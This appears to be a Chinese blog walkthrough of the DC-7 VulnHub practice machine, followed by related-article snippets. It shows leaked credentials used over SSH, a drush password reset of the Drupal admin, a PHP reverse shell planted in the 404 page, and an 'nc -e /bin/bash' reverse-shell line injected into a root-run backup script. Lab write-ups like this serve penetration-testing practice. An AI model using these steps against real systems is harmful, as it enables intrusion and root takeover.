DC-7 (drush更改密码)

最新推荐文章于 2022-12-29 14:13:21 发布
最新推荐文章于 2022-12-29 14:13:21 发布
阅读量258 收藏 1
点赞数
分类专栏: DC系列靶场 文章标签: php 开发语言 web linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127900795
版权

环境准备

DC-7靶机链接:百度网盘 请输入提取码

提取码:sii1

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机ip

arp-scan -l

2.探测目标靶机开放端口和服务情况

nmap -p- -A -T4 192.168.166.134

漏洞利用

1.查看网页

2.来到http://github.com 找到这个项目

config.php 这个文件下有惊喜

3.用户名:dc7user 密码:MdR3xOgB7#dW

直接尝试ssh登录,发现直接就登进去了

ssh dc7user@192.168.166.134


4.在dc7user用户下有封信 ,查看下

5.发现了一个 /opt/scripts/backups.sh

6.查看权限是root和普通用户才有权限,然后发现上面 的提示有一新的mail,查下看没求用

7.然后就进入到/var/www/html目录下,用drush命令修改www-data的密码

drush upwd admin --password="123456"

8.打开网站尝试使用修改的密码进行登录,发现登录成功

http://192.168.166.134/user/login admin 123456

9.随便点点,发现在content下面能写东西,就是没php,

点击extend在上面添加了插件可以写入php代码。

10.输入url https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 报错了,确实无语

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 百度登录下载包,选择文件上传

11.成功后 点击中间的添加模块那一行

把这个php filter选上,安装

下载成功 之后就可以直接进行写入文件

12.按照图操作,选择更改404页面

13.把php-reverse-shell.php(github里有)的代码复制下来,换成kali地址即可

权限提升

1.开启监听后,点击404 page 成功反弹shell

2.用python回弹交互式shell 目标,靶机里安装了nc ,把nc反弹shell的命令写入.sh文件中

python -c "import pty;pty.spawn('/bin/bash')"

nc -e /bin/bash 192.168.166.131 5555

3.我一直在等他弹shell,没等来 想着估计时间长,看下计划任务,压根没这个任务,用cat命令看了下,立刻就弹shell了。

不管咋说,最后也是轻松拿下!!!

魏钦6666
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
不要再打Drush命令了 告诉你Drupal Console強大的地方!
Jacky@BootDev@云系统开发
01-26 697
Drupal console简述 drupal console是一个能够生成代码样本与drupal交互并提供命令行接口CLI操作的工具。从重建缓存,到列出路由、服务以及模块。甚至还可以和配置管理进行交互。 Drupal console的诞生 一切都始于使Drupal 8更好的想法,每一项伟大的发明/创新都源于一个构想,而Drupal从7过渡到8伴随着对昨天基本操作程序的巨大改变。Jesus和David是Drupal Console项目的发起人,提出了将symfony控制台纳入Drupal核心的..
DC-7渗透笔记
现代鲁滨逊的博客
05-12 239
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。 1.发现主机192.168.174.158 2.照例nmap扫描,22和80端口都开着呢。 3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。 然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。 4.想扫目录来着,扫了好久都没扫完,就算了。 5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹ 6.没有思路,瞎捣鼓一通之后
Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)
qq_45722813的博客
12-09 3049
Vulnhub靶场渗透测试系列DC-7 靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1189
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
Drupal drush 常用命令
single_g_l的博客
08-13 985
Drupal drush 常用命令
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
_Co1a
05-09 892
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
ansible-role-drush:Ansible角色-Drupal的Drush
01-31
7. **整合到现有流程**:将"ansible-role-drush"集成到你的Ansible Playbook或自动化流程中,可以无缝地部署和更新Drupal网站的Drush环境。这有助于保持一致性并减少手动操作出错的可能性。 8. **持续集成/持续部署...
ansible-role-set-drush
02-20
在远程计算机上运行drush init 。 自定义远程计算机上的~/.drush/drushrc.php 。 在主机和远程计算机上创建别名。要求Drush安装在远程计算机上。角色变量# Enable the "common" structure-tables-key.# See ...
Ansible-ansible-role-drush.zip
09-18
《Ansible与Drush在自动化运维中的应用》 在现代IT环境中,自动化工具的重要性日益凸显。其中,Ansible和Drush是两个极具影响力的工具,分别在配置管理和Drupal网站管理方面发挥着关键作用。本文将深入探讨Ansible...
phpci-drush:PHPCI 的 Drush 插件
06-05
输出当前的 Drush 版本。 \mglaman\PhpciPlugins\DrushPlugin: command: "version" 启用特定模块。 \mglaman\PhpciPlugins\DrushPlugin: command: "pm-enable" arguments: - "ctools" - "panels" - "page...
Drupal-8-Starter-Gulp-SASS:基本Drupal 8主题-Gulp,Drush,Bootstrap,Sass +浏览器同步
02-03
Drupal-8-Starter-Gulp-SASS 使用Drush CLI,Boostrap 3 SASS,Gulp + BrowserSync实现自动化的Drupal 8入门主题。先决条件 必须在本地或全局安装才能使用Gulp自动执行缓存刷新。 建议使用Composer构建Drupal 8站点...
【每日打靶练习】靶机渗透实操-W1R3S(易)
最新发布
leo788的博客
12-29 958
试试读一下/etc/shadow文件,该文件存放用户名密码,得到了很像密码的两部分信息,分别对应着www-data用户-加密密码,w1r3s用户-加密密码,使用最小速率为10000来扫描靶机ip开放端口,端口数量为65536个,所以设置10000的速率来进行扫描,其默认是tcp扫描。对页面上的信息cuppa cms进行匹配,获取到一条信息xxx.txt,检查一下,发现cuppa cms这个存在文件包含漏洞。开放端口有:21-ftp,22-ssh,80-http,3306-mysql。
渗透测试:DC-7靶机
Ciyaso的博客
08-23 273
一、扫描获取靶机ip arp-scan -l 192.168.203.146 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.146 开放22、80端口 2.Wappaloyzer CMS:Drupal 8 Web服务器:Apache 2.4.25 操作系统:Debian 访问网站 提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工) 发现一个@用户 @DC7USER 搜索一下发现了一个github用户
php www-data,php – 访问被拒绝用户’www-data’@’localhost – 如何处理?
weixin_30480281的博客
03-10 593
www-data是运行apache和php的Debian用户.如果您在没有有效连接时尝试查询,则php / mysql将尝试使用< unix-user> @localhost创建一个没有密码的连接.这是www-data @ localhost(使用密码:NO)来自哪里.这个现在已经开始发生的最有可能的原因(尽管它在两年前已经运行良好)是您的数据库负载已经增加到某些连接无法成功的程度(可...
drush 命令操作drupal
苏公子的博客
01-22 3127
目前我用到的命令。持续更新 常用命令: $ drush cr  各种清缓存 $ drush pm-enable 安装module $ drush pm-uninstall 卸载module $ drush pm-list  显示所有modules and themes列表 $ drush user:password zhuangyuan "zhuangyuan" 更改密码   注:...
DC-7靶机练习
IWANnaaa的博客
11-03 215
DC-7靶场练习
DC-7靶机详细渗透步骤
wwxxss
11-04 661
DC7详细的渗透的步骤,它跳出了之前的思维,提供了我们还有源码泄露漏洞,希望大家能理解步骤
网络渗透测试实验四
m0_64229840的博客
11-21 688
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。
linux系统提权——基于已经拿到www-data权限
热门推荐
m0re's blog
08-25 1万+
前言:上次学习利用目录遍历漏洞获取了一个反弹的webshell,但是权限是www-data,不是root权限,所以这次学习提权,拿到root权限。 本文目录提权介绍提权方式内核漏洞提权明文root密码提权计划任务总结: 提权介绍 往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 提权前提: 已经拿到低权shell 被入侵的机器上面有nc,python,perl等非常常见的工具 有权
掌握Drupal 8:从零开始构建与管理网站
10. **开发实践**:包含多章内容,如模块的内部结构分析、多语言支持、网站后台管理、命令行工具Drush的应用,以及版本控制Git的使用。 11. **响应式设计**:介绍如何创建适应不同设备的响应式网站,确保在不同屏幕...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值